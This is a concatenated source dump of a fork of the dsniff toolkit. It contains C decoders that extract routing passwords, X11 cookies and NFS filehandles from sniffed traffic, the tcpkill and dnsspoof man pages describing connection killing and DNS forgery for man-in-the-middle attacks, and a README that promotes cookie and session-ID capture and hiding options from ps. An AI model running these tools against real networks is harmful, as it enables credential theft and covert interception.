dsniff. v1.5 Tue Feb 15 23:22:25 EST 2000 - Fix HTTP proxy support in urlsnarf (from ). - Fix HTTP proxy support in dsniff (from ). - Proper manpages for all programs. - Strip binary nulls in telnet input, in dsniff (doh!). v1.4 Thu Jan 27 12:08:41 EST 2000 - Add verbose flag (-v) to tcpkill, tcpnice. - Add NNTP parsing to dsniff (from Felix von Leitner ). - Fix mailsniff mbox formatting of ^From in message body. - Add HTTP proxy support in dsniff, urlsnarf, webspy. - Fix getopt() usage to be POSIX compliant (s/EOF/-1/). - New tcpnice program. v1.3 Fri Jan 21 02:47:37 EST 2000 - Ported to Solaris (along with libnids :-) - Add Berkeley db(3) output file format to dsniff, as well as restricting logging to unique auth info. - New tcpkill program. - New lame dsniff(8) manpage. - Add DNS lookups (and -n flag to disable) in dsniff, urlsnarf. - Add HTTP Basic Authentication, Referer, User-Agent logging to urlsnarf. - Improve RPC message parsing in dsniff. - Improve SMTP parsing in mailsnarf. - Improve HTTP 1.x parsing in dsniff, urlsnarf, webspy. - Fix IMAP, Rlogin, Telnet option parsing in dsniff (broke them in 1.2). - Add X11 MIT-MAGIC-COOKIE parsing to dsniff. - Don't forget to decode POP SASL username in dsniff (doh!). v1.2 Sat Jan 8 22:36:42 EST 2000 - Ported to FreeBSD (but not tested!). - Add GNU autoconf support. - Add NFS mount parsing / RPC framework to dsniff. - Add -i flag to specify interface to use with dsniff, mailsnarf, urlsnarf, and webspy. v1.1 Tue Dec 21 10:31:42 EST 1999 (re-released) - Make macof loop repeatedly if missing -n argument. - Remove dependencies on unreleased version of libnids. - Make arpredirect restore original ARP mapping on exit. - Ported to Linux & Solaris (but not tested!). v1.0 Fri Dec 17 02:42:42 EST 1999 - First public release. hackerschoice-dsniff-a17510d/decode_rip.c0000664000175000017500000000110715105626144020252 0ustar epsilonepsilon/* * decode_rip.c * * Routing Information Protocol. * * Copyright (c) 2000 Dug Song * * $Id: decode_rip.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" int decode_rip(u_char *buf, int len, u_char *obuf, int olen) { if (len < 21) return (0); /* Version 2 simple password authentication. */ if (buf[1] != 2 || memcmp(buf + 4, "\xff\xff\x00\x02", 4) != 0) return (0); buf[20] = '\0'; return (snprintf(obuf, olen, "%s\n", buf + 20)); } hackerschoice-dsniff-a17510d/decode_ospf.c0000664000175000017500000000075615105626144020440 0ustar epsilonepsilon/* * decode_ospf.c * * Open Shortest Path First. * * Copyright (c) 2000 Dug Song * * $Id: decode_ospf.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "decode.h" int decode_ospf(u_char *buf, int len, u_char *obuf, int olen) { if (len < 25) return (0); if (pntohs(buf + 14) != 1) return (0); buf[24] = '\0'; return (snprintf(obuf, olen, "%s\n", buf + 16)); } hackerschoice-dsniff-a17510d/decode_napster.c0000664000175000017500000000147715105626144021146 0ustar epsilonepsilon/* * decode_napster.c * * Napster. w00w00! * * Copyright (c) 2000 Dug Song * * $Id: decode_napster.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include "buf.h" #include "decode.h" int decode_napster(u_char *buf, int len, u_char *obuf, int olen) { struct buf inbuf, outbuf; u_short i, type; buf_init(&inbuf, buf, len); buf_init(&outbuf, obuf, olen); if (buf_get(&inbuf, &i, sizeof(i)) != sizeof(i)) return (0); i = pletohs(&i); if (buf_get(&inbuf, &type, sizeof(type)) != sizeof(type)) return (0); type = pletohs(&type); if (type != 2 || i > buf_len(&inbuf)) return (0); buf_put(&outbuf, buf_ptr(&inbuf), i); buf_put(&outbuf, "\n", 1); buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/decode_x11.c0000664000175000017500000000130515105626144020071 0ustar epsilonepsilon/* * decode_x11.c * * X11. * * Copyright (c) 2000 Dug Song * * $Id: decode_x11.c,v 1.4 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include "decode.h" int decode_x11(u_char *buf, int len, u_char *obuf, int olen) { char *p, *q; int i; p = buf + 12; if (strncmp(p, "MIT-MAGIC-COOKIE-1", 18) != 0 || len < 36) return (0); strlcpy(obuf, "MIT-MAGIC-COOKIE-1 ", olen); p += 20; len -= 20; q = obuf + 19; for (i = 0; i < 16 && i < len; i++) sprintf(q + (i * 2), "%.2x", (u_char)p[i]); strlcat(obuf, "\n", olen); return (strlen(obuf)); } hackerschoice-dsniff-a17510d/tcpkill.80000664000175000017500000000144215105626144017546 0ustar epsilonepsilon.TH TCPKILL 8 .ad .fi .SH NAME tcpkill \- kill TCP connections on a LAN .SH SYNOPSIS .na .nf .fi \fBtcpkill\fR [\fB-i \fIinterface\fR] [\fB-1\fR...\fB9\fR] \fIexpression\fR .SH DESCRIPTION .ad .fi \fBtcpkill\fR kills specified in-progress TCP connections (useful for libnids-based applications which require a full TCP 3-whs for TCB creation). .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP \fB-1\fR...\fB9\fR Specify the degree of brute force to use in killing a connection. Fast connections may require a higher number in order to land a RST in the moving receive window. Default is 3. .IP \fIexpression\fR Specify a tcpdump(8) filter expression to select the connections to kill. .SH "SEE ALSO" dsniff(8), tcpnice(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/decode_portmap.c0000664000175000017500000000306715105626144021151 0ustar epsilonepsilon/* * decode_portmap.c * * RPC portmap. * * Copyright (c) 2000 Dug Song * * $Id: decode_portmap.c,v 1.8 2001/03/15 08:33:02 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include "rpc.h" #include "trigger.h" #include "decode.h" int decode_portmap(u_char *buf, int len, u_char *obuf, int olen) { XDR xdrs; struct rpc_msg msg; struct pmap *pm, pmap; struct xid_map *xm; int hdrlen; if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return (0); if (msg.rm_direction == CALL && msg.rm_call.cb_prog == PMAPPROG && msg.rm_call.cb_proc == PMAPPROC_GETPORT) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); if (xdr_pmap(&xdrs, &pmap)) { if ((pm = malloc(sizeof(*pm))) != NULL) { *pm = pmap; xid_map_enter(msg.rm_xid, PMAPPROG, PMAPVERS, PMAPPROC_GETPORT, (void *) pm); } } xdr_destroy(&xdrs); } else if (msg.rm_direction == REPLY && (xm = xid_map_find(msg.rm_xid)) != NULL) { if (msg.rm_reply.rp_stat == MSG_ACCEPTED && msg.acpted_rply.ar_stat == SUCCESS) { pm = (struct pmap *)xm->data; xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); if (xdr_u_long(&xdrs, &pm->pm_port)) { trigger_rpc(pm->pm_prog, pm->pm_prot, pm->pm_port); trigger_rpc(pm->pm_prog, pm->pm_prot, 0 - (int) pm->pm_port); } xdr_destroy(&xdrs); } free(xm->data); memset(xm, 0, sizeof(*xm)); } return (0); } hackerschoice-dsniff-a17510d/nfs_prot.c0000664000175000017500000003337115105626144020017 0ustar epsilonepsilon/* * Please do not edit this file. * It was generated using rpcgen. */ #include "nfs_prot.h" #include "config.h" bool_t xdr_nfsstat (XDR *xdrs, nfsstat *objp) { register int32_t *buf; if (!xdr_enum (xdrs, (enum_t *) objp)) return FALSE; return TRUE; } bool_t xdr_ftype (XDR *xdrs, ftype *objp) { register int32_t *buf; if (!xdr_enum (xdrs, (enum_t *) objp)) return FALSE; return TRUE; } bool_t xdr_nfs_fh (XDR *xdrs, nfs_fh *objp) { register int32_t *buf; int i; if (!xdr_opaque (xdrs, objp->data, NFS_FHSIZE)) return FALSE; return TRUE; } bool_t xdr_nfstime (XDR *xdrs, nfstime *objp) { register int32_t *buf; if (!xdr_u_int (xdrs, &objp->seconds)) return FALSE; if (!xdr_u_int (xdrs, &objp->useconds)) return FALSE; return TRUE; } bool_t xdr_fattr (XDR *xdrs, fattr *objp) { register int32_t *buf; if (xdrs->x_op == XDR_ENCODE) { if (!xdr_ftype (xdrs, &objp->type)) return FALSE; buf = XDR_INLINE (xdrs, 10 * BYTES_PER_XDR_UNIT); if (buf == NULL) { if (!xdr_u_int (xdrs, &objp->mode)) return FALSE; if (!xdr_u_int (xdrs, &objp->nlink)) return FALSE; if (!xdr_u_int (xdrs, &objp->uid)) return FALSE; if (!xdr_u_int (xdrs, &objp->gid)) return FALSE; if (!xdr_u_int (xdrs, &objp->size)) return FALSE; if (!xdr_u_int (xdrs, &objp->blocksize)) return FALSE; if (!xdr_u_int (xdrs, &objp->rdev)) return FALSE; if (!xdr_u_int (xdrs, &objp->blocks)) return FALSE; if (!xdr_u_int (xdrs, &objp->fsid)) return FALSE; if (!xdr_u_int (xdrs, &objp->fileid)) return FALSE; } else { IXDR_PUT_U_LONG(buf, objp->mode); IXDR_PUT_U_LONG(buf, objp->nlink); IXDR_PUT_U_LONG(buf, objp->uid); IXDR_PUT_U_LONG(buf, objp->gid); IXDR_PUT_U_LONG(buf, objp->size); IXDR_PUT_U_LONG(buf, objp->blocksize); IXDR_PUT_U_LONG(buf, objp->rdev); IXDR_PUT_U_LONG(buf, objp->blocks); IXDR_PUT_U_LONG(buf, objp->fsid); IXDR_PUT_U_LONG(buf, objp->fileid); } if (!xdr_nfstime (xdrs, &objp->atime)) return FALSE; if (!xdr_nfstime (xdrs, &objp->mtime)) return FALSE; if (!xdr_nfstime (xdrs, &objp->ctime)) return FALSE; return TRUE; } else if (xdrs->x_op == XDR_DECODE) { if (!xdr_ftype (xdrs, &objp->type)) return FALSE; buf = XDR_INLINE (xdrs, 10 * BYTES_PER_XDR_UNIT); if (buf == NULL) { if (!xdr_u_int (xdrs, &objp->mode)) return FALSE; if (!xdr_u_int (xdrs, &objp->nlink)) return FALSE; if (!xdr_u_int (xdrs, &objp->uid)) return FALSE; if (!xdr_u_int (xdrs, &objp->gid)) return FALSE; if (!xdr_u_int (xdrs, &objp->size)) return FALSE; if (!xdr_u_int (xdrs, &objp->blocksize)) return FALSE; if (!xdr_u_int (xdrs, &objp->rdev)) return FALSE; if (!xdr_u_int (xdrs, &objp->blocks)) return FALSE; if (!xdr_u_int (xdrs, &objp->fsid)) return FALSE; if (!xdr_u_int (xdrs, &objp->fileid)) return FALSE; } else { objp->mode = IXDR_GET_U_LONG(buf); objp->nlink = IXDR_GET_U_LONG(buf); objp->uid = IXDR_GET_U_LONG(buf); objp->gid = IXDR_GET_U_LONG(buf); objp->size = IXDR_GET_U_LONG(buf); objp->blocksize = IXDR_GET_U_LONG(buf); objp->rdev = IXDR_GET_U_LONG(buf); objp->blocks = IXDR_GET_U_LONG(buf); objp->fsid = IXDR_GET_U_LONG(buf); objp->fileid = IXDR_GET_U_LONG(buf); } if (!xdr_nfstime (xdrs, &objp->atime)) return FALSE; if (!xdr_nfstime (xdrs, &objp->mtime)) return FALSE; if (!xdr_nfstime (xdrs, &objp->ctime)) return FALSE; return TRUE; } if (!xdr_ftype (xdrs, &objp->type)) return FALSE; if (!xdr_u_int (xdrs, &objp->mode)) return FALSE; if (!xdr_u_int (xdrs, &objp->nlink)) return FALSE; if (!xdr_u_int (xdrs, &objp->uid)) return FALSE; if (!xdr_u_int (xdrs, &objp->gid)) return FALSE; if (!xdr_u_int (xdrs, &objp->size)) return FALSE; if (!xdr_u_int (xdrs, &objp->blocksize)) return FALSE; if (!xdr_u_int (xdrs, &objp->rdev)) return FALSE; if (!xdr_u_int (xdrs, &objp->blocks)) return FALSE; if (!xdr_u_int (xdrs, &objp->fsid)) return FALSE; if (!xdr_u_int (xdrs, &objp->fileid)) return FALSE; if (!xdr_nfstime (xdrs, &objp->atime)) return FALSE; if (!xdr_nfstime (xdrs, &objp->mtime)) return FALSE; if (!xdr_nfstime (xdrs, &objp->ctime)) return FALSE; return TRUE; } bool_t xdr_filename (XDR *xdrs, filename *objp) { register int32_t *buf; if (!xdr_string (xdrs, objp, NFS_MAXNAMLEN)) return FALSE; return TRUE; } bool_t xdr_nfspath (XDR *xdrs, nfspath *objp) { register int32_t *buf; if (!xdr_string (xdrs, objp, NFS_MAXPATHLEN)) return FALSE; return TRUE; } bool_t xdr_diropargs (XDR *xdrs, diropargs *objp) { register int32_t *buf; if (!xdr_nfs_fh (xdrs, &objp->dir)) return FALSE; if (!xdr_filename (xdrs, &objp->name)) return FALSE; return TRUE; } bool_t xdr_diropokres (XDR *xdrs, diropokres *objp) { register int32_t *buf; if (!xdr_nfs_fh (xdrs, &objp->file)) return FALSE; if (!xdr_fattr (xdrs, &objp->attributes)) return FALSE; return TRUE; } bool_t xdr_diropres (XDR *xdrs, diropres *objp) { register int32_t *buf; if (!xdr_nfsstat (xdrs, &objp->status)) return FALSE; switch (objp->status) { case NFS_OK: if (!xdr_diropokres (xdrs, &objp->diropres_u.diropres)) return FALSE; break; default: break; } return TRUE; } bool_t xdr_readargs (XDR *xdrs, readargs *objp) { register int32_t *buf; if (!xdr_nfs_fh (xdrs, &objp->file)) return FALSE; if (!xdr_u_int (xdrs, &objp->offset)) return FALSE; if (!xdr_u_int (xdrs, &objp->count)) return FALSE; if (!xdr_u_int (xdrs, &objp->totalcount)) return FALSE; return TRUE; } bool_t xdr_readokres (XDR *xdrs, readokres *objp) { register int32_t *buf; if (!xdr_fattr (xdrs, &objp->attributes)) return FALSE; if (!xdr_bytes (xdrs, (char **)&objp->data.data_val, (u_int *) &objp->data.data_len, NFS_MAXDATA)) return FALSE; return TRUE; } bool_t xdr_readres (XDR *xdrs, readres *objp) { register int32_t *buf; if (!xdr_nfsstat (xdrs, &objp->status)) return FALSE; switch (objp->status) { case NFS_OK: if (!xdr_readokres (xdrs, &objp->readres_u.reply)) return FALSE; break; default: break; } return TRUE; } bool_t xdr_uint64 (XDR *xdrs, uint64 *objp) { register int32_t *buf; if (!xdr_uint64_t (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_int64 (XDR *xdrs, int64 *objp) { register int32_t *buf; if (!xdr_int64_t (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_uint32 (XDR *xdrs, uint32 *objp) { register int32_t *buf; if (!xdr_u_int (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_int32 (XDR *xdrs, int32 *objp) { register int32_t *buf; if (!xdr_int (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_filename3 (XDR *xdrs, filename3 *objp) { register int32_t *buf; if (!xdr_string (xdrs, objp, ~0)) return FALSE; return TRUE; } bool_t xdr_nfspath3 (XDR *xdrs, nfspath3 *objp) { register int32_t *buf; if (!xdr_string (xdrs, objp, ~0)) return FALSE; return TRUE; } bool_t xdr_fileid3 (XDR *xdrs, fileid3 *objp) { register int32_t *buf; if (!xdr_uint64 (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_cookie3 (XDR *xdrs, cookie3 *objp) { register int32_t *buf; if (!xdr_uint64 (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_cookieverf3 (XDR *xdrs, cookieverf3 objp) { register int32_t *buf; if (!xdr_opaque (xdrs, objp, NFS3_COOKIEVERFSIZE)) return FALSE; return TRUE; } bool_t xdr_createverf3 (XDR *xdrs, createverf3 objp) { register int32_t *buf; if (!xdr_opaque (xdrs, objp, NFS3_CREATEVERFSIZE)) return FALSE; return TRUE; } bool_t xdr_writeverf3 (XDR *xdrs, writeverf3 objp) { register int32_t *buf; if (!xdr_opaque (xdrs, objp, NFS3_WRITEVERFSIZE)) return FALSE; return TRUE; } bool_t xdr_uid3 (XDR *xdrs, uid3 *objp) { register int32_t *buf; if (!xdr_uint32 (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_gid3 (XDR *xdrs, gid3 *objp) { register int32_t *buf; if (!xdr_uint32 (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_size3 (XDR *xdrs, size3 *objp) { register int32_t *buf; if (!xdr_uint64 (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_offset3 (XDR *xdrs, offset3 *objp) { register int32_t *buf; if (!xdr_uint64 (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_mode3 (XDR *xdrs, mode3 *objp) { register int32_t *buf; if (!xdr_uint32 (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_count3 (XDR *xdrs, count3 *objp) { register int32_t *buf; if (!xdr_uint32 (xdrs, objp)) return FALSE; return TRUE; } bool_t xdr_nfsstat3 (XDR *xdrs, nfsstat3 *objp) { register int32_t *buf; if (!xdr_enum (xdrs, (enum_t *) objp)) return FALSE; return TRUE; } bool_t xdr_ftype3 (XDR *xdrs, ftype3 *objp) { register int32_t *buf; if (!xdr_enum (xdrs, (enum_t *) objp)) return FALSE; return TRUE; } bool_t xdr_specdata3 (XDR *xdrs, specdata3 *objp) { register int32_t *buf; if (!xdr_uint32 (xdrs, &objp->specdata1)) return FALSE; if (!xdr_uint32 (xdrs, &objp->specdata2)) return FALSE; return TRUE; } bool_t xdr_nfs_fh3 (XDR *xdrs, nfs_fh3 *objp) { register int32_t *buf; if (!xdr_bytes (xdrs, (char **)&objp->data.data_val, (u_int *) &objp->data.data_len, NFS3_FHSIZE)) return FALSE; return TRUE; } bool_t xdr_nfstime3 (XDR *xdrs, nfstime3 *objp) { register int32_t *buf; if (!xdr_uint32 (xdrs, &objp->seconds)) return FALSE; if (!xdr_uint32 (xdrs, &objp->nseconds)) return FALSE; return TRUE; } bool_t xdr_fattr3 (XDR *xdrs, fattr3 *objp) { register int32_t *buf; if (!xdr_ftype3 (xdrs, &objp->type)) return FALSE; if (!xdr_mode3 (xdrs, &objp->mode)) return FALSE; if (!xdr_uint32 (xdrs, &objp->nlink)) return FALSE; if (!xdr_uid3 (xdrs, &objp->uid)) return FALSE; if (!xdr_gid3 (xdrs, &objp->gid)) return FALSE; if (!xdr_size3 (xdrs, &objp->size)) return FALSE; if (!xdr_size3 (xdrs, &objp->used)) return FALSE; if (!xdr_specdata3 (xdrs, &objp->rdev)) return FALSE; if (!xdr_uint64 (xdrs, &objp->fsid)) return FALSE; if (!xdr_fileid3 (xdrs, &objp->fileid)) return FALSE; if (!xdr_nfstime3 (xdrs, &objp->atime)) return FALSE; if (!xdr_nfstime3 (xdrs, &objp->mtime)) return FALSE; if (!xdr_nfstime3 (xdrs, &objp->ctime)) return FALSE; return TRUE; } bool_t xdr_post_op_attr (XDR *xdrs, post_op_attr *objp) { register int32_t *buf; if (!xdr_bool (xdrs, &objp->attributes_follow)) return FALSE; switch (objp->attributes_follow) { case TRUE: if (!xdr_fattr3 (xdrs, &objp->post_op_attr_u.attributes)) return FALSE; break; case FALSE: break; default: return FALSE; } return TRUE; } bool_t xdr_wcc_attr (XDR *xdrs, wcc_attr *objp) { register int32_t *buf; if (!xdr_size3 (xdrs, &objp->size)) return FALSE; if (!xdr_nfstime3 (xdrs, &objp->mtime)) return FALSE; if (!xdr_nfstime3 (xdrs, &objp->ctime)) return FALSE; return TRUE; } bool_t xdr_pre_op_attr (XDR *xdrs, pre_op_attr *objp) { register int32_t *buf; if (!xdr_bool (xdrs, &objp->attributes_follow)) return FALSE; switch (objp->attributes_follow) { case TRUE: if (!xdr_wcc_attr (xdrs, &objp->pre_op_attr_u.attributes)) return FALSE; break; case FALSE: break; default: return FALSE; } return TRUE; } bool_t xdr_wcc_data (XDR *xdrs, wcc_data *objp) { register int32_t *buf; if (!xdr_pre_op_attr (xdrs, &objp->before)) return FALSE; if (!xdr_post_op_attr (xdrs, &objp->after)) return FALSE; return TRUE; } bool_t xdr_diropargs3 (XDR *xdrs, diropargs3 *objp) { register int32_t *buf; if (!xdr_nfs_fh3 (xdrs, &objp->dir)) return FALSE; if (!xdr_filename3 (xdrs, &objp->name)) return FALSE; return TRUE; } bool_t xdr_LOOKUP3args (XDR *xdrs, LOOKUP3args *objp) { register int32_t *buf; if (!xdr_diropargs3 (xdrs, &objp->what)) return FALSE; return TRUE; } bool_t xdr_LOOKUP3resok (XDR *xdrs, LOOKUP3resok *objp) { register int32_t *buf; if (!xdr_nfs_fh3 (xdrs, &objp->object)) return FALSE; if (!xdr_post_op_attr (xdrs, &objp->obj_attributes)) return FALSE; if (!xdr_post_op_attr (xdrs, &objp->dir_attributes)) return FALSE; return TRUE; } bool_t xdr_LOOKUP3resfail (XDR *xdrs, LOOKUP3resfail *objp) { register int32_t *buf; if (!xdr_post_op_attr (xdrs, &objp->dir_attributes)) return FALSE; return TRUE; } bool_t xdr_LOOKUP3res (XDR *xdrs, LOOKUP3res *objp) { register int32_t *buf; if (!xdr_nfsstat3 (xdrs, &objp->status)) return FALSE; switch (objp->status) { case NFS3_OK: if (!xdr_LOOKUP3resok (xdrs, &objp->LOOKUP3res_u.resok)) return FALSE; break; default: if (!xdr_LOOKUP3resfail (xdrs, &objp->LOOKUP3res_u.resfail)) return FALSE; break; } return TRUE; } bool_t xdr_READ3args (XDR *xdrs, READ3args *objp) { register int32_t *buf; if (!xdr_nfs_fh3 (xdrs, &objp->file)) return FALSE; if (!xdr_offset3 (xdrs, &objp->offset)) return FALSE; if (!xdr_count3 (xdrs, &objp->count)) return FALSE; return TRUE; } bool_t xdr_READ3resok (XDR *xdrs, READ3resok *objp) { register int32_t *buf; if (!xdr_post_op_attr (xdrs, &objp->file_attributes)) return FALSE; if (!xdr_count3 (xdrs, &objp->count)) return FALSE; if (!xdr_bool (xdrs, &objp->eof)) return FALSE; if (!xdr_bytes (xdrs, (char **)&objp->data.data_val, (u_int *) &objp->data.data_len, ~0)) return FALSE; return TRUE; } bool_t xdr_READ3resfail (XDR *xdrs, READ3resfail *objp) { register int32_t *buf; if (!xdr_post_op_attr (xdrs, &objp->file_attributes)) return FALSE; return TRUE; } bool_t xdr_READ3res (XDR *xdrs, READ3res *objp) { register int32_t *buf; if (!xdr_nfsstat (xdrs, &objp->status)) return FALSE; switch (objp->status) { case NFS3_OK: if (!xdr_READ3resok (xdrs, &objp->READ3res_u.resok)) return FALSE; break; default: if (!xdr_READ3resfail (xdrs, &objp->READ3res_u.resfail)) return FALSE; break; } return TRUE; } hackerschoice-dsniff-a17510d/README.md0000664000175000017500000000343315105626144017274 0ustar epsilonepsilon## Resurrection and enhancements of [Dug Song's](https://en.wikipedia.org/wiki/W00w00) all-time-classic network sniffer: * Hides the command line options (`ENV_ARGS=`) from the process list (`ps`). * Show Banners (`-v`). * HTTP parsing improvements & Cookie logging. * No duplicates: Reports each result only once. * Stand-alone & static binary (no need for dsniff.magic/dsniff.services) * Deep-Packet-Inspection (`-m`). Port agnostic. Download the [Pre Compiled Static Binary](https://github.com/hackerschoice/dsniff/releases/latest) for Linux, FreeBSD and OpenBSD. ```sh curl -SsfL "https://github.com/hackerschoice/dsniff/releases/latest/download/dsniff_linux-$(uname -m)" -o dsniff ``` Run (example): ```sh export ENV_ARGS="-i eth0 -v -m not port 443" # hide options from the process list ./dsniff ``` The reason why I prefer dsniff over most others: 1. The results give a quick overview who/where SSL/SSH is being used. 1. It logs Cookies and Session IDs. 1. It shows plaintext HTTP `Location: ` redirects to HTTPS. 1. It shows WireGuard or SSH on non-default ports (like port 31337). Those tend to be worthy admins. ![dsniff-thc-screenshot](https://github.com/hackerschoice/dsniff/assets/5938498/d3eeb16c-dd64-41f6-b839-ca7a70e34778) Compile: ```sh ./configure --enable static && make dsniff ``` ### Useful parameters: `-C` - Force Color [default is to show color on TTY only] `-P` - Use promisc mode `-v` - Show banners (SNI, SSH, HTTP, Cookies, ...) `-m` - Detect protocol regardless of the port (e.g ssh on port 222 etc). Compare [original](https://packages.debian.org/source/unstable/dsniff): [Diff](https://github.com/hackerschoice/dsniff/compare/orig...main) Original [README](README) --- Similar tools: * https://github.com/lgandx/PCredz * https://github.com/DanMcInerney/net-creds hackerschoice-dsniff-a17510d/arp.c0000664000175000017500000000445615105626144016751 0ustar epsilonepsilon/* * arp.c * * ARP cache routines. * * Copyright (c) 1999 Dug Song * * $Id: arp.c,v 1.8 2001/03/15 08:32:58 dugsong Exp $ */ #include "config.h" #include #include #include #ifdef BSD #include #include #include #ifdef __FreeBSD__ /* XXX */ #define ether_addr_octet octet #endif #else /* !BSD */ #include #ifndef __linux__ #include #endif #endif /* !BSD */ #include #include #include #include #include #include #include #include #include "arp.h" #ifdef BSD int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* linf) { int mib[6]; size_t len; char *buf, *next, *end; struct rt_msghdr *rtm; struct sockaddr_inarp *sin; struct sockaddr_dl *sdl; mib[0] = CTL_NET; mib[1] = AF_ROUTE; mib[2] = 0; mib[3] = AF_INET; mib[4] = NET_RT_FLAGS; mib[5] = RTF_LLINFO; if (sysctl(mib, 6, NULL, &len, NULL, 0) < 0) return (-1); if ((buf = (char *)malloc(len)) == NULL) return (-1); if (sysctl(mib, 6, buf, &len, NULL, 0) < 0) { free(buf); return (-1); } end = buf + len; for (next = buf ; next < end ; next += rtm->rtm_msglen) { rtm = (struct rt_msghdr *)next; sin = (struct sockaddr_inarp *)(rtm + 1); sdl = (struct sockaddr_dl *)(sin + 1); if (sin->sin_addr.s_addr == ip && sdl->sdl_alen) { memcpy(ether->ether_addr_octet, LLADDR(sdl), ETHER_ADDR_LEN); free(buf); return (0); } } free(buf); return (-1); } #else /* !BSD */ #ifndef ETHER_ADDR_LEN /* XXX - Solaris */ #define ETHER_ADDR_LEN 6 #endif int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether, const char* lif) { int sock; struct arpreq ar; struct sockaddr_in *sin; memset((char *)&ar, 0, sizeof(ar)); #ifdef __linux__ strncpy(ar.arp_dev, lif, strlen(lif)); #endif sin = (struct sockaddr_in *)&ar.arp_pa; sin->sin_family = AF_INET; sin->sin_addr.s_addr = ip; if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { return (-1); } if (ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1) { close(sock); return (-1); } close(sock); memcpy(ether->ether_addr_octet, ar.arp_ha.sa_data, ETHER_ADDR_LEN); return (0); } #endif /* !BSD */ hackerschoice-dsniff-a17510d/dnsspoof.80000664000175000017500000000210715105626144017736 0ustar epsilonepsilon.TH DNSSPOOF 8 .ad .fi .SH NAME dnsspoof \- forge replies to DNS address / pointer queries .SH SYNOPSIS .na .nf .fi \fBdnsspoof\fR [\fB-i \fIinterface\fR] [\fB-f \fIhostsfile\fR] [\fIexpression\fR] .SH DESCRIPTION .ad .fi \fBdnsspoof\fR forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. .SH OPTIONS .IP "\fB-i \fIinterface\fR" Specify the interface to use. .IP "\fB-f \fIhostsfile\fR" Specify the pathname of a file in hosts(5) format. Only one hostname allowed per line (no aliases), although hostnames may contain wildcards (such as \fI*.doubleclick.net\fR). .IP "\fIexpression\fR" Specify a tcpdump(8) filter expression to select traffic to sniff. .LP If no \fIhostsfile\fR is specified, replies will be forged for all address queries on the LAN with an answer of the local machine's IP address. .SH FILES .IP \fI/usr/share/dsniff/dnsspoof.hosts\fR Sample hosts file. .SH "SEE ALSO" dsniff(8), hosts(5) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/decode_mountd.c0000664000175000017500000000340715105626144020773 0ustar epsilonepsilon/* * decode_mountd.c * * RPC mountd. * * Outputs filehandle in nfsshell format. :-) * * Copyright (c) 2000 Dug Song * * $Id: decode_mountd.c,v 1.7 2001/03/15 08:33:01 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include "buf.h" #include "mount.h" #include "rpc.h" #include "decode.h" int decode_mountd(u_char *buf, int len, u_char *obuf, int olen) { XDR xdrs; struct buf outbuf; struct rpc_msg msg; struct xid_map *xm; struct fhstatus fhstat; char *p, *dir; int i, hdrlen; buf_init(&outbuf, obuf, olen); if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) return (0); if (msg.rm_direction == CALL && msg.rm_call.cb_prog == MOUNTPROG && msg.rm_call.cb_proc == MOUNTPROC_MNT) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); dir = NULL; if (xdr_string(&xdrs, &dir, MAXPATHLEN)) { xid_map_enter(msg.rm_xid, MOUNTPROG, MOUNTVERS, MOUNTPROC_MNT, (void *) dir); } xdr_destroy(&xdrs); } else if (msg.rm_direction == REPLY && (xm = xid_map_find(msg.rm_xid)) != NULL) { if (msg.rm_reply.rp_stat == MSG_ACCEPTED && msg.acpted_rply.ar_stat == SUCCESS) { xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); if (xdr_fhstatus(&xdrs, &fhstat)) { if (fhstat.fhs_status == 0) { buf_putf(&outbuf, "%s [", (char *)xm->data); p = fhstat.fhstatus_u.fhs_fhandle; for (i = 0; i < FHSIZE; i++) { buf_putf(&outbuf, "%.2x ", p[i] & 0xff); } buf_put(&outbuf, "]\n", 2); } } xdr_destroy(&xdrs); } free(xm->data); memset(xm, 0, sizeof(*xm)); } buf_end(&outbuf); return (buf_len(&outbuf)); } hackerschoice-dsniff-a17510d/mailsnarf.c0000664000175000017500000002005315105626144020132 0ustar epsilonepsilon/* * mailsnarf.c * * Sniff mail on a network, saving messages in Berkeley mbox format. * * Copyright (c) 1999 Dug Song * * $Id: mailsnarf.c,v 1.38 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include "pcaputil.h" #include "buf.h" /* bogus SMTP state machine */ enum { SMTP_NONE = 0, SMTP_HELO, SMTP_MAIL, SMTP_RCPT, SMTP_DATA }; /* likewise, POP. */ enum { POP_NONE = 0, POP_RETR, POP_DATA }; struct smtp_info { int state; char *from; }; struct pop_info { int state; }; int Opt_invert = 0; regex_t *pregex = NULL; static void usage(void) { fprintf(stderr, "Version: " VERSION 